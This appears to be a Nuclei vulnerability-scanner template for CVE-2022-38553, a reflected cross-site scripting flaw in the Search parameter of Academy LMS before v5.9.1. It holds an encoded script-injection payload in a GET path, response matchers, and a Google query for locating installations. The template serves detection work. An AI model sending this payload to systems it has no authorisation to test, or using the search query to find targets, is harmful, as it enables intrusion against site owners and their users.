id: CVE-2022-38553 info: name: Academy Learning Management System < v5.9.1 - Reflected XSS author: edoardottt severity: medium description: | Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter. reference: - https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity - https://github.com/4websecurity/CVE-2022-38553 - https://nvd.nist.gov/vuln/detail/CVE-2022-38553 - https://codecanyon.net/item/academy-course-based-learning-management-system/22703468 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38553 cwe-id: CWE-79 metadata: google-query: intext:"Study any topic, anytime" verified: "true" tags: cve,cve2022,academylms,xss requests: - method: GET path: - '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' matchers-condition: and matchers: - type: word part: body words: - '">' - 'Study any topic' condition: and - type: word part: header words: - 'text/html' - type: status status: - 200